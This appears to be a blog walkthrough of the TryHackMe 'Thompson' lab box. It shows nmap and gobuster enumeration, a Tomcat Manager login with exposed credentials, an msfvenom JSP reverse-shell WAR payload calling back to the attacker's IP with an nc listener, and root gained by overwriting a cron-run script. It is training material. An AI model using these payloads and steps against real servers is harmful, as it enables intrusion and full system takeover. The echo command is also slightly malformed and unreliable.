Thompson — CTF Walkthrough
Hello Everyone! Welcome to the new blog in this blog we are going to cover step by step challenge of a box named Thompson on tryhackme.
Before starting make sure that you are connected to the tryhackme VPN and machine is deployed successfully.
After deploying the machine wait for 2–3 minutes and then ping the machine to confirm that it is working properly.
So here we are getting ping back form the machine and our machine is up and working properly.
Now start the nmap scan to find out the ports open and services running on the machine.
command : nmap -sS -sC -sV -A -O 10.10.112.158
In this scan we are scanning normally and we found that http service running on port 8080. Let’s check what is we found using http service.
And we found that Apache Tomcat/8.5.5 is running on port 8080.
For further enumeration we scan for all the directories using gobuster.
we found that we can login to the Manager App but we don’t have credentials.
Just after pressing the cancel the we are redirected to a web page which has credentials to access the Manager App.
Now. let’s try to login to the Manager App using the credentials that we found on the web.
we are redirected to the ‘Tomcat Web Application Manager’ Dashboard.
While enumerating the page we found that we can deploy our own war file to the server.
Let’s create a payload with .war extension using msfvenom. While creating the file we define LHOST as VPN IP address and port LPORT as a desirable port on which we want our machine to listen for upcoming connection.
Command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.178.153 LPORT=1234 -T war > shell.war
Our file is created successfully, now we listen to the port that we define in our payload
command: nc -lnvp 1234
Now we will upload the shell.war file.
After deploying the file check the Dashboard and find the URI with the name same as our exploit and here we named our exploit as ‘exploit’ . Then click on the URI and go the terminal windows where we stated listening to the port that we defined in our payload.
And our exploit worked successfully and we are connected to the machine.
Let’s move to the home directory and check for all the users available in the machine. And we found a user ‘jack’. Now we check jack directory for our flag. And we found user flag in the jack directory. Let’s check the content of the flag and submit to the tryhackme challenge.
After lot of enumeration in crontab, we found bash id.sh file in /home/jack directory running as root every minute.
command :
So we deleted the original existing file named id.sh and created dubplicate id.sh file adding the below command into the file.
command : echo ‘cp /root/root.txt /home/jack/root.txt > id.sh
Now after 1 min the file id.sh will be executed as root. So, on checking the current directory we found root.txt file and hence root flag
We have successfully completed the challenge. Hope you guys enjoyed it.
Thank you.
